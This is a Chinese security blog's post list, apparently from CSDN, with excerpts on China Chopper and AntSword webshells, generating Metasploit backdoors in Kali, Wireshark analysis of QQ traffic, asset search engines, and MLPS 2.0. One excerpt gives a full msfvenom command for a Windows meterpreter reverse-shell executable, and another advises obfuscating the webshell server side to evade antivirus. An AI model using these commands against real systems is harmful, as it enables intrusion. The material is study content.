- 博客(5)
- 收藏
- 关注
RSS订阅原创 菜刀及蚁剑
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站都可用它来进行管理!在非简体中文环境下使用自动切换到英文界面。UNICODE方式编译,支持多国语言输入。已被各大安全厂商提取其特征。其中Sp4ar是连接密码,可以随意更改。也可对服务端做一些混淆操作,防止被查杀。
2024-10-31 17:48:22
402
原创 Kali生成被控端并对生成的被控端进行检测
通过参数如-p指定payload,-f指定输出格式,-e指定encoder,-a指定目标架构等,可以生成不同平台的后门文件。实例中展示了如何生成普通后门、编码处理后的后门以及捆绑到现有文件的后门。(1)在终端输入:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= ip地址 lport=10010 -f exe -o /home/yu/Desktop/payload.exe 生成可执行文件payload.exe。
2024-10-30 23:17:28
805
原创 Wireshark应用(QQ流量分析)
用wireshark对QQ9进行流量分析,QQ9使用TCP加密 利用wireshark分析QQ流量 寻找发出的图片并解密得到原图追踪该TCP流并拿到发送的图片 用winnex打开拿到的图片,删除加密 删除后得到原图:
2024-10-10 17:26:59
258
原创 与ZoomEye功能类似的搜索引擎的网站信息收集
结合这些搜索引擎,用户可以有效地进行网络安全研究、漏洞检测和资产管理等工作。需要注意的是,使用这些工具时应遵循法律法规和道德规范。与 ZoomEye 功能类似的搜索引擎有几个,可以用于网络设备和服务的安全扫描和信息收集。以下为使用VirusTotal扫描抖音()可以输入域名,查看相关的子域名信息。提供子域名查找和其他 DNS 信息。
2024-10-08 20:36:07
1159
原创 对等级保护2.0的理解
等级保护2.0是信息安全领域的一个重要升级,它不仅关注物理安全,更强调网络、系统、应用和数据等各个方面的安全,从系统整体角度出发,全面分析、评估和应对各种安全风险。它强调安全策略的动态调整,以适应不断变化的安全环境,并要求建立完善的安全管理制度和应急响应机制,以最大限度地保护关键基础设施的安全。等级保护2.0是对关键基础设施的全面、系统、动态的保护,涉及安全策略、安全技术、安全管理和安全评估等多个方面。1. 全面性:等级保护2.0不仅关注基础设施的物理安全,还包括网络、系统、应用、数据等各个方面的安全。
2024-10-08 20:07:49
625
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人